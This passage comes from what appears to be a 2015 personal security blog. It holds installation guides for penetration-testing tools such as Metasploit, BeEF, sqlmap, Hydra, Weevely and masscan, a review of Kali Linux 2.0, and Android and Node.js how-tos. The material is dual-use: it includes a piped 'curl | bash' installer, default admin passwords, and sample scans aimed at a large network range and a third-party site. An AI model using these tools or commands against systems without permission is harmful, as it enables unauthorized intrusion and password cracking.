Moreover, due to its integrated browser environment, it can also audit and inspect client-side code, as well as support highly complicated web applications which make heavy use of technologies such as JavaScript, HTML5, DOM manipulation and AJAX.

Finally, it is versatile enough to cover a great deal of use cases, ranging from a simple command line scanner utility, to a global high performance grid of scanners, to a Ruby library allowing for scripted audits, to a multi-user multi-scan web collaboration platform.


Install

cd ~
cd arsenal
wget https://github.com/Arachni/arachni/releases/download/v1.2.1/arachni-1.2.1-0.5.7.1-linux-x86_64.tar.gz
tar -xvzf arachni-1.2.1-0.5.7.1-linux-x86_64.tar.gz
cd arachni-1.2.1-0.5.7.1/bin
./arachni_web


Start Firefox and point to http://127.0.0.1:9292

* Default credentials are as the following :

Administrator account

E-mail: admin@admin.admin
Password: administrator

Regular user account

E-mail: user@user.user
Password: regular_user


Update/Upgrade

rm -R ~/arsenal/arachni-1.2.1-0.5.7.1

Then repeat the Install procedure but to download the latest version.


Reference

Wiki


That's all! See you.


Sunday, August 23, 2015

HOWTO : NoSQLMap on Ubuntu 14.04 LTS

NoSQLMap is an open source Python tool designed to audit for as well as automate injection attacks and exploit default configuration weaknesses in NoSQL databases as well as web applications using NoSQL in order to disclose data from the database.

It is named as a tribute to Bernardo Damele and Miroslav's Stampar's popular SQL injection tool sqlmap, and its concepts are based on and extensions of Ming Chow's excellent presentation at Defcon 21, "Abusing NoSQL Databases". Presently the tool's exploits are focused around MongoDB, but additional support for other NoSQL based platforms such as CouchDB, Redis, and Cassandra are planned in future releases.


Install

sudo apt-get install git python-setuptools

cd ~
mkdir arsenal
cd arsenal
git clone https://github.com/tcstool/nosqlmap.git
cd nosqlmap
sudo python setup.py install
python nosqlmap.py



Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade

cd ~/arsenal/nosqlmap
git pull origin master
python setup.py install --force



Reference

GitHub
Videos

See also : Metasploit Framework


That's all! See you.


HOWTO : BeEF on Ubuntu 14.04 LTS

BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.

Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.


Install

sudo apt-get install git curl git libsqlite3-dev sqlite3 imagemagick ghostscript

Install Ruby :

gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3
curl -sSL https://get.rvm.io | bash -s stable
source ~/.rvm/scripts/rvm
echo "source ~/.rvm/scripts/rvm" >> ~/.bashrc
source ~/.bashrc
rvm install 2.1.5
ruby -v


Install BeEF :

cd ~
mkdir arsenal
cd arsenal
git clone git://github.com/beefproject/beef.git

cd beef
rvm use ruby-2.1.5@beef --create
gem install bundler
bundle install
./beef


Open browser at go to http://127.0.0.1:3000/ui/panel
* username is "beef" while password is "beef".

* BeEF is default using Ruby 2.1.5.


Update/Upgrade

cd ~/arsenal/beef
git pull origin master
bundle install
./update-beef



Reference

Videos

See also : Metasploit Framework


That's all! See you.


HOWTO : SET on Ubuntu 14.04 LTS

The Social-Engineer Toolkit (SET) was created and written by the founder of TrustedSec. It is an open-source Python-driven tool aimed at penetration testing around Social-Engineering. SET has been presented at large-scale conferences including Blackhat, DerbyCon, Defcon, and ShmooCon. With over two million downloads, SET is the standard for social-engineering penetration tests and supported heavily within the security community.


Install

sudo apt-get install git python-impacket

cd ~
mkdir arsenal
cd arsenal
git clone https://github.com/trustedsec/social-engineer-toolkit.git
cd social-engineer-toolkit


sudo python setup.py install

Edit the Metasploit path :

nano /etc/setoolkit/set.config
METASPLOIT_PATH=/home/samiux/arsenal/metasploit-framework


* Please replace your path

To run it :

sudo setoolkit


Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade

sudo seupdate



Reference

See also : Metasploit Framework


That's all! See you.


HOWTO : Metasploit Framework on Ubuntu 14.04 LTS

Metasploit is an exploitation framework.


Install

sudo apt-get install git build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev default-jre git autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev libxslt1-dev xtightvncviewer libyaml-dev curl zlib1g-dev libffi-dev libgmp-dev

cd ~
mkdir arsenal
cd arsenal

Install Ruby :

gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3
curl -sSL https://get.rvm.io | bash -s stable
source ~/.rvm/scripts/rvm
echo "source ~/.rvm/scripts/rvm" >> ~/.bashrc
source ~/.bashrc
rvm install 2.1.6
rvm use 2.1.6 --default
ruby -v


* Metasploit Framework use ruby 2.1.6 by default

Install NMap :

* Install NMap if you do not have it installed; otherwise, skip it.

cd ~/arsenal
git clone https://github.com/nmap/nmap.git
cd nmap
./configure
make
sudo make install


Configure PostgreSQL :

sudo -s
su postgres

createuser msf -P -S -R -D

* enter "msf" as password
createdb -O msf msf
exit
exit


Install Metasploit Framework :

cd ~/arsenal
git clone https://github.com/rapid7/metasploit-framework.git
cd metaploit-framework
rvm --default use ruby-2.1.6@metasploit-framework --create
gem install bundler
bundle install


Configure Metasploit :

cp ~/arsenal/metasploit-framework/config/database.yml.example ~/arsenal/metasploit-framework/config/database.yml
nano ~/arsenal/metasploit-framework/config/database.yml

development: &pgsql
  adapter: postgresql
  database: msf
  username: msf
  password: msf
  host: localhost
  port: 5432
  pool: 75
  timeout: 5

sudo sh -c "echo export MSF_DATABASE_CONFIG=/home/samiux/arsenal/metasploit-framework/config/database.yml >> /etc/profile"

source /etc/profile


* please rename the /home/samiux to your name.

To run it :

cd ~/arsenal
cd metasploit-framework
sudo service postgresql start
msfconsole
sudo service postgresql stop



Update/Ugrade

sudo apt-get update
sudo apt-get dist-upgrade
cd ~/arsenal/metasploit-framework
git pull origin master
msfupdate



Reference

See also : NMap


That's all! See you.


Saturday, August 22, 2015

HOWTO : John on Ubuntu 14.04 LTS

John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix systems, supported out of the box are Windows LM hashes, plus lots of other hashes and ciphers in the community-enhanced version.


Install

sudo apt-get install build-essential libssl-dev

cd ~
mkdir arsenal
cd arsenal

wget http://www.openwall.com/john/j/john-1.8.0-jumbo-1.tar.gz
tar -xvzf john-1.8.0-jumbo-1.tar.gz
cd john-1.8.0-jumbo-1/src

./configure
make clean
make

cd ../run
./john --help



* you can also install by sudo apt-get install john john-data


Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade


Go to Official site to download the source and compile it as mentioned above.


Reference

Please install Nvidia or AMD Graphic related drivers before installing John when necessary.


That's all! See you.


HOWTO : NetCat on Ubuntu 14.04 LTS

Netcat is a simple Unix utility which reads and writes data across network connections, using TCP or UDP protocol.

It is designed to be a reliable "back-end" tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities. Netcat, or "nc" as the actual program is named, should have been supplied long ago as another one of those cryptic but standard Unix tools.


Install

sudo apt-get install netcat-traditional
sudo update-alternatives --config nc


select /bin/nc.traditional by entering "2"

nc -h


Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade



Reference

Nil


That's all! See you.


HOWTO : CMSMap on Ubuntu 14.04 LTS

CMSmap is a python open source CMS scanner that automates the process of detecting security flaws of the most popular CMSs. The main purpose of CMSmap is to integrate common vulnerabilities for different types of CMSs in a single tool.

At the moment, CMSs supported by CMSmap are WordPress, Joomla and Drupal.


Install

sudo apt-get install git

cd ~
mkdir arsenal
cd arsenal
git clone https://github.com/Dionach/CMSmap.git
cd CMSmap
python cmsmap.py -t http://www.google.com



Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade

cd ~/arsenal/CMSmap
git pull origin master



Reference

Nil


That's all! See you.


Thursday, August 20, 2015

HOWTO : ZAP on Ubuntu 14.04 LTS

The Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications.

It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing.

ZAP provides automated scanners as well as a set of tools that allow you to find security vulnerabilities manually.


Install

sudo apt-get install default-jre unzip

cd ~
mkdir arsenal
cd arsenal

wget https://github.com/zaproxy/zaproxy/releases/download/w2015-08-12/ZAP_WEEKLY_D-2015-08-12.zip
unzip ZAP_WEEKLY_D-2015-08-12.zip
rm ZAP_WEEKLY_D-2015-08-12.zip
cd ZAP_D-2015-08-12
./zap.sh



* ZAP_WEEKLY_D-2015-08-12.zip as example.
* ZAP Team generate weekly releases of ZAP from the trunk, typically every Monday.
These are just intended for people who want to use all of the features we've added since the last 'full' release but dont want the hassle of building ZAP from the source code.
While we endeavor to ensure that weekly releases are robust, things may be broken or only partially implemented.


Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade


cd ~/arsenal/

Go to Download to download ZAP Weekly and repeat the procedure of "Install" previously mentioned.


Reference

Wiki

Video


That's all! See you.

HOWTO : Burp Suite on Ubuntu 14.04 LTS

Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities.

Burp gives you full control, letting you combine advanced manual techniques with state-of-the-art automation, to make your work faster, more effective, and more fun.


Install

sudo apt-get install curl default-jre

cd ~
mkdir arsenal
cd arsenal
mkdir burpsuite
cd burpsuite
curl https://portswigger.net/DownloadUpdate.ashx?Product=Free -o burpsuite_free.jar
java -jar -Xmx1024m burpsuite_free.jar



Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade

cd ~/arsenal/burpsuite
rm burpsuite_free.jar
curl https://portswigger.net/DownloadUpdate.ashx?Product=Free -o burpsuite_free.jar



Reference

Getting Started

Documentation

See also : Professional Edition


That's all! See you.

Wednesday, August 19, 2015

HOWTO : Weevely on Ubuntu 14.04 LTS

Weevely is a command line web shell dynamically extended over the network at runtime designed for remote administration and pen testing. It provides a weaponized telnet-like console through a PHP script running on the target, even in restricted environments.

The low footprint agent and over 30 modules shape an extensible framework to administrate, conduct a pen-test, post-exploit, and audit remote web accesses in order to escalate privileges and pivot deeper in the internal networks.


Install

sudo apt-get install git build-essential python-pip libyaml-dev python-dev
sudo pip install prettytable Mako PyYAML python-dateutil PySocks --upgrade

cd ~
mkdir arsenal
cd arsenal
git clone https://github.com/epinna/weevely3.git
cd weevely3
./weevely.py



Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade
sudo pip install prettytable Mako PyYAML python-dateutil PySocks --upgrade

cd ~/arsenal/weevely3
git pull origin master



Reference

Wiki


That's all! See you.

Tuesday, August 18, 2015

HOWTO : SQLMap on Ubuntu 14.04 LTS

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.


Install

sudo apt-get install git

cd ~
mkdir arsenal
cd arsenal
git clone https://github.com/sqlmapproject/sqlmap.git
cd sqlmap
python sqlmap.py -hh



Update/Upgrade

cd ~/arsenal/sqlmap
python sqlmap.py --update



Reference

Wiki

See also : SQLMap Web GUI


That's all! See you.

HOWTO : THC-Hydra on Ubuntu 14.04 LTS

Number one of the biggest security holes are passwords, as every password security study shows.

THC-Hydra is a proof of concept code, to give researchers and security consultants the possiblity to show how easy it would be to gain unauthorized access from remote to a system.

Install

sudo apt-get install git build-essential libssl-dev libssh-dev libidn11-dev libpcre3-dev libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev firebird-dev libncurses5-dev libafpclient-dev

cd ~
mkdir arsenal
cd arsenal
git clone https://github.com/vanhauser-thc/thc-hydra.git
cd thc-hydra
./configure
make
./hydra -h
./xhydra



* Oracle, NCP and SAP/R3 are not supported in this build as there are no libraries available from the repos
* you can install by sudo apt-get install hydra hydra-gtk


Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade

cd ~/arsenal/thc-hydra
git pull origin master
make clean
./configure
make



Reference

Official site


That's all! See you.

HOWTO : NMap on Ubuntu 14.04 LTS

Nmap (“Network Mapper”) is an open source tool for network exploration and security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. While Nmap is commonly used for security audits, many systems and network administrators find it useful for routine tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime.

Install

sudo apt-get install git build-essential

cd ~
mkdir arsenal
git clone https://github.com/nmap/nmap.git
cd nmap
./configure
make
sudo make install
sudo nmap -sS -sV 192.168.0.100



* or you can install by sudo apt-get install nmap


Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade

cd ~/arsenal/nmap
git pull origin master
make clean
make
sudo make install



Reference

Reference Guide


That's all! See you.

HOWTO : Masscan on Ubuntu 14.04 LTS

Masscan is the fastest Internet port scanner. It can scan the entire Internet in under 6 minutes, transmitting 10 million packets per second.

It produces results similar to nmap, the most famous port scanner. Internally, it operates more like scanrand, unicornscan, and ZMap, using asynchronous transmission. The major difference is that it's faster than these other scanners. In addition, it's more flexible, allowing arbitrary address ranges and port ranges.

NOTE: masscan uses a custom TCP/IP stack. Anything other than simple port scans will cause conflict with the local TCP/IP stack. This means you need to either use the -S option to use a separate IP address, or configure your operating system to firewall the ports that masscan uses.


Install

To install Masscan on Ubuntu 14.04.03 LTS Desktop :

sudo apt-get install git build-essential libpcap-dev

cd ~
mkdir arsenal
cd arsenal
git clone https://github.com/robertdavidgraham/masscan.git
cd masscan
make
sudo bin/masscan -p80,8000-8100 10.0.0.0/8



Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade

cd ~/arsenal/masscan
git pull origin master
make clean
make



Reference

Official site

Wiki


That's all! See you.


HOWTO : Spiderfoot on Ubuntu 14.04 LTS

SpiderFoot is an open source intelligence automation tool. Its goal is to automate the process of gathering intelligence about a given target, which may be an IP address, domain name, hostname or network subnet.

SpiderFoot can be used offensively, i.e. as part of a black-box penetration test to gather information about the target or defensively to identify what information your organisation is freely providing for attackers to use against you.


Install

To install Spiderfoot on Ubuntu 14.04.3 LTS Desktop :

sudo apt-get install git python-dev python-pip python-m2crypto python-netaddr python-pypdf python-stem python-lxml

sudo pip install cherrypy mako


cd ~
mkdir arsenal
cd arsenal
git clone https://github.com/smicallef/spiderfoot.git
cd spiderfoot
python sf.py


Then, use your Firefox to browse http://127.0.0.1:5001/


Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade

sudo pip install cherrypy mako--upgrade

cd ~/arsenal/spiderfoot
git pull origin master


Reference

Documentation


That's all! See you.

HOWTO : Recon-ng on Ubuntu 14.04 LTS

Recon-ng is a full-featured Web Reconnaissance framework written in Python. Complete with independent modules, database interaction, built in convenience functions, interactive help, and command completion, Recon-ng provides a powerful environment in which open source web-based reconnaissance can be conducted quickly and thoroughly.

Recon-ng has a look and feel similar to the Metasploit Framework, reducing the learning curve for leveraging the framework. However, it is quite different. Recon-ng is not intended to compete with existing frameworks, as it is designed exclusively for web-based open source reconnaissance. If you want to exploit, use the Metasploit Framework. If you want to social engineer, use the Social-Engineer Toolkit. If you want to conduct reconnaissance, use Recon-ng!


Install

To install Recon-ng on Ubuntu 14.04.3 LTS Desktop :

sudo apt-get install git python-pip python-dnspython python-mechanize python-slowaes python-xlsxwriter python-jsonrpclib python-lxml

sudo pip install dicttoxml


cd ~
mkdir arsenal
cd arsenal
git clone https://LaNMaSteR53@bitbucket.org/LaNMaSteR53/recon-ng.git
cd recon-ng
./recon-ng



Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade

sudo pip install dicttoxml --upgrade

cd ~/arsenal/recon-ng
git pull origin master



Reference

Usage Guide

Development Guide


That's all! See you.

Wednesday, August 12, 2015

REVIEW : First Impression on Kali Linux 2.0

*** Please note that all the tests are testing on Linux host (Ubuntu 14.04.3), Windows host may have some different results. ***

*** Updated on August 14, 2015 : VirtualBox 5.0.2 for Linux fixed the slow speed (VMM: fixed an issue causing artifically high load averages on Linux hosts). ***

Kali Linux 2.0 is released on today (August 11, 2014 EST). I downloaded 64-bit full version and installed it on VirtualBox 5.0. The host computer has Intel Celeron(R) CPU N2930 @ 1.83GHz × 4 and 8 GB RAM. I assigned 5 GB RAM to Kali Linux 2.0. It is quite slow for it to run with 5GB RAM on my VirtualBox 5.0. Meanwhile, the sound always mute on every start up even you have set it before.





(A) Installation

When installing via non-graphic interface, you may encounter no network mirror repos, you need to bypass it by selecting "Continue without a network mirror? Yes" and we will edit the /etc/apt/sources.list later. Graphic interface may also has the same problem too.

After the installation is completed, we can edit the /etc/apt/sources.list if you encountered no mirror repos when install.

nano /etc/apt/sources.list

The content of the file should be looking like this :

deb http://http.kali.org/kali sana main non-free contrib
deb-src http://http.kali.org/kali sana main non-free contrib
deb http://security.kali.org/kali-security/ sana/updates main contrib non-free
deb-src http://security.kali.org/kali-security/ sana/updates main contrib non-free


(B) Install VirtualBox 5.0 Guest Additions CD

When you are going to install VirtualBox 5.0 Guest Additions CD, you need to install dkms first :

apt-get install dkms

* It will also install related headers files. If not, you need to install the headers files yourself.

When install VirtualBox Guest Additions CD, you may encounter the following error :

*** Error in `systemctl': double free or corruption (fasttop): 0x00007fc0cb648ae0 ***

It should be systemctl error. I do not know what it will be affected so far. After checking the dmesg message, the error is due to :

systemd[1]: Cannot add dependency job for unit vboxadd-service.service, ignoring: Unit vboxadd-service.service failed to load: No such file or directory.

It is recommended to uninstall the Guest Additions CD at the moment and some features will be not available on the guest virtual machine.

(C) Uninstall VirtualBox 5.0 Guest Additions CD

To uninstall VirtualBox Guest Additions, run :

/opt/VBoxGuestAdditions-5.0.0/uninstall.sh

This error will show again :

*** Error in `systemctl': double free or corruption (fasttop): 0x00007f124e3f2ae0 ***

(D) Not working properly applications

The following applications are launched from the Quick Menu on the left hand side of the screen.

armitage - it cannot be launched
Maltego - it launches but it cannot be operated and it cannot be quit too
BeEF - it shows an error and no login screen is displayed UNLESS you start the "beef start" at "System Services" under "Applications" menu

There may be some more other applications that cannot work, such as "system log", "VLC media player", "ImageMagick" and etc. I cannot test them all one by one as they are too many.

* Even the VirtualBox Guest Additions is uninstalled or reinstall the Kali 2.0, the captioned applications still do not working properly

** Other applications on the Applications menu are not tested as well as those are not in the Applications menu

*** Running BeEF, it produces the following error :
(process:1371): GLib-CRITICAL **: g_slice_set_config: assertion 'sys_page_size = 0' failed

(E) Conclusion

Kali Linux 2.0 is not well tested before it is released. It is very disappointed. Kali 2.0 is slower than 1.1.0a on the same testing machine. Or you may need a more powerful computer or laptop to do with it. Some applications cannot be running properly on the Quick Menu in this release. DISAPPOINTED!

That's all! See you.


Update on August 12, 2015

I conducted a random test on Kali Linux 2.0, I found the following :

redis-server is running in the background.

Apache2 is listening on TCP6 only instead of TCP4 and TCP6 at the same time.

OpenVAS cannot be started properly via "Applications", "System services", "openvas start". Systemd error produced.

It seems that systemd is buggy.


Update on August 13, 2015

After talking with the founder of Offensive Security (muts), I going to install Kali Linux 2.0 to other virtual machine software to see the result.

I try to install Kali Linux 2.0 on VMWare Workstation 11 for Linux on a laptop (Lenovo Thinkpad X200 with 4GB RAM) but it failed in the middle and the installation never completed. I do not have Workstation 12, so I cannot test it.

Then, I pick up another laptop (Lenovo Thinkpad X201s with 8GB RAM) which is running VirtualBox 4.3.30 on Ubuntu 14.04. I assigned 4GB RAM to Kali. The installation is smooth. May be the Kali Linux repos server is out of the DDoS. (Kali Linux repos server has been DDoS for hours since it is released according to the founder of Offensive Security).

The VirtualBox Guest Additions CD is installed without problem. However, "armitage", "system log", "VLC media player" and "ImageMagick" do not launched. Meanwhile, "redis-server" is running in the background; "Apache2" is listening on TCP6 only. "systemd" errors will be produced on selecting "openvas start".

On the other hand, "Maltego" and "BeEF" are working properly with only one click.

Kali Linux 2.0 is running fast and responsive on VirtualBox 4.3.30.

Some users at #kali-linux (IRC channel) found some weird problems, such as "thin.services" is running and making the system very slow.

Ubuntu 14.04.4 desktop is running smoothly on VirtualBox 5.0. It is suspected that Kali Linux 2.0 selects hardware and virtual machine software.

The conclusion is changed to ACCEPTABLE! Kali Linux Team should be doing better.


Update on August 13, 2015 (Part 2)

This time, I want to test Kali Linux 2.0 VirtualBox 64-bit image and it is running 2GB RAM and 30GB hard drive.

There is a "kali-proposed-updates.list" at /etc/apt/sources.list.d/ and the content is :

deb http://http.kali.org/kali sana-proposed-updates main contrib non-free

Running on VirtualBox 5.0 on Ubuntu 14.04.3 host :

"armitage" cannot be launched.
"maltego" cannot run properly and it cannot be quit.
"BeEF" launched but no login screen UNLESS run "beef start" at "System services" under "Applications".

"VLC media player" and "ImageMagick" do not work.
"system log" works.
"Apache2" is listening on TCP6 only.
"redis-server" is running in the background.

"dkms" accompanied with only one headers file.
Guest Additions CD install with the same "systemctl" error message.

"systemd" errors will be produced on selecting "openvas start".

Running on VirtualBox 4.3.30 on Ubuntu 14.04.3 host :

"armitage" cannot be launched.
"maltego" and "BeEF" can be launched with one click.

"VLC media player" and "ImageMagick" do not work.
"system log" works.
"Apache2" is listening on TCP6 only.
"redis-server" is running in the background.

"dkms" accompanied with only one headers file.
Guest Additions CD install with the same "systemctl" error message.

* Not kidding, it has error message.

"systemd" errors will be produced on selecting "openvas start".

Obviously, Kali Linux Team did not well test their work before it is released. The content of VirtualBox image is different from the ISO. The rating is still remain as ACCEPTABLE!

I will not test any ISO or image files for this release any more. May be wait for the next release.

* It seems that this VirtualBox image is installed VirtualBox 5.0 Guest Additions CD


Update on August 14, 2015

muts stated that I am misinformed. Therefore, I make a very boring video (about 26 minutes long) to proof which is posted at the beginning of this article today.

The Kali Linux official site asks user to use VirtualBox 4.2.xx or higher to run.

Armitage is updated yesterday by Kali Linux Team. Therefore, it is working fine now. Meanwhile, VirtualBox is updated from 5.0.0 to 5.0.2 and the high CPU loading on Linux host is fixed.

I also test Debian 8.1 (latest update) on the same environment and installed the Guest Additions CD. I also encounter the "systemctl double free or corruption (fasttop)" error. This error may be from VirtualBox 5.0.x or from Debian.

However, Kali Linux Team forgot to test their amazing Kali Linux 2.0 with VirtualBox 5.0.x on Linux host. Therefore, the rating is still ACCEPTABLE.


Update on August 17, 2015

Fedora 22 is systemd by default. I install Fedora 22 (64-bit) on VirtualBox 5.0.2 with Ubuntu 14.04 host without any problem or error, including Guest Additions CD install.

I also test Kali Linux 2.0 (64-bit) on VirutalBox 5.0.2 with Mac OSX 10.10.5 and it has the similar errors.


Update on August 25, 2015

Since I do not like Kali Linux 2.0, I install my favourite tools on Ubuntu 14.04 LTS recently (please refers to here). I find out that at least BeEF is running very difference between Kali Linux 2.0 and Ubuntu 14.04 on VirtualBox 5.0.2. Kali Linux 2.0 will produces error messages while Ubuntu does not. Both version of BeEF are 0.4.6.1-alpha. I make a video on that, here you are :




Thursday, August 06, 2015

HOWTO : Stagefright Vulnerabilities Detection and Protection on Android

What is Stagefright vulnerabilities in Android?

Android devices running Android versions 2.2 through 5.1.1_r5 contain vulnerabilities in the Stagefright media playback engine. Exploitation of these vulnerabilities may allow an attacker to access multimedia files or potentially take control of a vulnerable device.

Detection

To test your Andorid if it is vulnerable to Stagefright vulnerabilities, you can use the following Apps by Zimperium INC.

Google Play - Stagefright Detector by Zimperium INC

Protection

It is recommended to update/upgrade your Android ROM to non-vulnerable version. If your vendors do not release any update/upgrade, you can perform the following steps for a workaround.

Workaround to protect your Android device

Remarks

I confirmed that CyanogenMod 12.1 Nightly for OnePlus One is fixed the Stagefright vulnerabilities by using Google Play - Stagefright Detector by Zimperium INC while OnePlus One v5.0.2 (Cyanogen OS version 12.0-YNG1TAS2I3) and Google Nexus 5 v5.1.1 (Build number LMY48B) are still vulnerable to Stagefright vulnerabilities at the time of this writing.

It is also confirmed that CyanogenMod 12.0 and 12.1 are fixed for the vulnerabilities. Or, you may consider to flash CyanogenMod ROM if your devices are supported.

If you have OnePlus One, you can follow this guide to update/upgrade your OnePlus One.

That's all! See you.

Monday, August 03, 2015

Node Chat Room (NodeChat)

The Node Chat Room (NodeChat) is developed with Node.js and it is forked from "Smashing Node.js: JavaScript Everywhere" Chapter 6. It is modified by Samiux and is released under GPLv3 License.

It provides basic chat room features, including private message. It will not save anything in the server.




You can download it at here.

That's all! See you.

Saturday, August 01, 2015

HOWTO : Install Node.js 0.12.7 on Ubuntu 14.04.2 LTS x86_64

Install node.js binaries :

wget https://nodejs.org/dist/v0.12.7/node-v0.12.7-linux-x64.tar.gz

cd /usr/local && sudo tar --strip-components 1 -xzf ~/node-v0.12.7-linux-x64.tar.gz

node --version
npm --version


Install express :

sudo npm install -g express

Install express executable :

sudo npm install -g express-generator

Create a project namely blog, for example :

express blog

cd blog

sudo npm install

To run the blog project :

npm start

Start the browser at http://localhost:3000 and you will see a sample site.

Now, you can edit the files in the blog directory to made you site.

Remark :

If you are compiling Node.js from source, you need the following packages :

sudo apt-get install build-essential libssl-dev apache2-utils

That's all! See you.

Thursday, July 30, 2015

HOWTO : Flash CyanogenMod 12.1 ROM to OnePlus One

Hardware : OnePlus One 64GB (Black) (CyanogenMod 12, Android 5.0.2)
Desktop : Ubuntu Desktop 14.04.2 LTS
Accessories : OTG USB cable and 32GB USB thumb drive

I am running Ubuntu Desktop 14.04.2 LTS. However, the android-tools-adb is out of date to operate with Android 5.1. So, we use OTG USB to copy all the required files to the OnePlus One ("storage" directory) instead of using adb command.

Step 1 :

Install Android tools :

sudo apt-get update
sudo apt-get install android-tools-adb android-tools-fastboot


Step 2 :

Enable the Developer options at OnePlus One :

"Settings" -- "About phone"

Then tap on "Build number" for seven times

"Settings" -- "Developer options"

Enable Android debugging
Enable Advanced reboot
Disable Cyanogen recovery


Step 3 :

Unlock the bootloader :
*** Please note that all user data will be destoryed for this step ***

sudo adb reboot bootloader

or

Reboot to bootloader by selecting "Bootloader" from OnePlus One

Then,

sudo fastboot oem unlock

OnePlus One will be reboot.

Step 4 :

TWRP Recovery (TeamWin Recovery) for OnePlus One :

https://twrp.me/devices/oneplusone.html

Download the latest TWRP for OnePlus One :

https://dl.twrp.me/bacon/
e.g. twrp-2.8.7.0-bacon.img

Then rename it to twrp.img and copy to "storage" directory of OnePlus One.

Flash TWRP Recovery :

Reboot to Fastboot by selecting "Bootloader" from OnePlus One

or

sudo adb reboot bootloader
sudo fastboot devices
sudo flash recovery twrp.img


* Make sure your computer has been allowed to communicate with the OnePlus One (there will be a pop up for your to confirm).

OnePlus One will be shutdown and then you boot it up to TWRP Recovery by holding "Volume Down" and "Power" button.

Step 5 :

CyanogenMod 12.1 Nightly ROM (Android 5.1.1) for OnePlus One (There is no stable CyanogenMod 12.x ROM for OnePlus One) :

http://download.cyanogenmod.org/?device=bacon&type=nightly

Copy the CyanogenMod ROM, such as cm-12.1-20150729-NIGHTY-bacon.zip, to "storage" directory of OnePlus One.

Flash CyanogenMod ROM :

Reboot to TWRP Recovery. Select "Backup". To backup the OnePlus One stock ROM (CyanogenMod 12).

Select "Wipe". To delete all data EXCEPT "System" and "Internal storage" as your CyanogenMod 12.1 ROM is there. This step must do, otherwise; your flash will be failed due to "incorrect signature".

Select "Install". To select "/0" and then "/storage", select the CyanogenMod 12.1 Nightly image file.

Step 6 :

Get Android 5.1 Google Play :

sudo apt-get update
sudo apt-get install git


git clone https://github.com/cgapps/vendor_google.git

For OnePlus One, you need to get :

~/vendor_google/arm/gapp-5.1-arm-2015-07-17-13-29.zip

Copy the gapp-5.1-arm-2015-07-17-13-29.zip to "storage" directory of OnePlus One.

Boot to TWRP Recovery and select "Install" to install Google Play.

Now you can configure your OnePlus One with CyanogenMod 12.1 ROM and download the Apps from Google Play.

Optional :

If you want to replace the TWRP Recovery with the CyanogenMod Recovery, you can enable "Cyanogen recovery" at "Developer options". When the next Nightly update is available, you can OTA it and it will replace the TWRP Recovery with CyanogenMod Recovery :

Enable Cyanogen recovery

You can consider to lock your bootloader back too :

sudo fastboot oem lock

*** If you unlock the bootloader, all your data will be destroyed ***

You can also consider to turn off the "Developer options" and disable "Advanced root" as well as "Android debugging".

Remark

CyanogenMod stated that the recent Stagefright vulnerabilities has been fixed in CyanogenMod 12 and 12.1 Nightlies before the time of this writing. Please refer to here.

Since Android ROM may have vulnerabilities, it is better to buy Google Android products as it will provide the most latest fix or update to their devices. Or you can consider to flash responsible 3rd party ROM developers, such as CyanogenMod. However, my Google Nexus 5 (5.1.1) does not have the fix OTA at the time of this writing. So sad.

UPDATE on August 06, 2015

I confirmed that CyanogenMod 12.1 Nightly for OnePlus One is fixed the Stagefright vulnerabilities by using Google Play - Stagefright Detector by Zimperium INC while OnePlus One v5.0.2 (Cyanogen OS version 12.0-YNG1TAS2I3) and Google Nexus 5 v5.1.1 (Build number LMY48B) are still vulnerable to Stagefright vulnerabilities.

That's all! See you.

Friday, July 17, 2015

HOWTO : Disable TLS/SSL RC4 On Firefox

This article and accompanied youtube video are showing you that TLS/SSL RC4 is now considered vulnerable. If you are running website that using RC4 cipher, please consider to disable it. If you are using Firefox, you can disable it by using the following command :

At the url address field, enter "about:config" and then search for "rc4". After that, change all the entries from "true" to "false". Please note that there should be 4 entries for RC4.

To check your server, please click here.

To check your browser, please click here.

That's all! See you.

REFERENCE

RC4 NOMORE

Tuesday, July 14, 2015

HOWTO : Play Youtube With HTML5 Instead of Flash

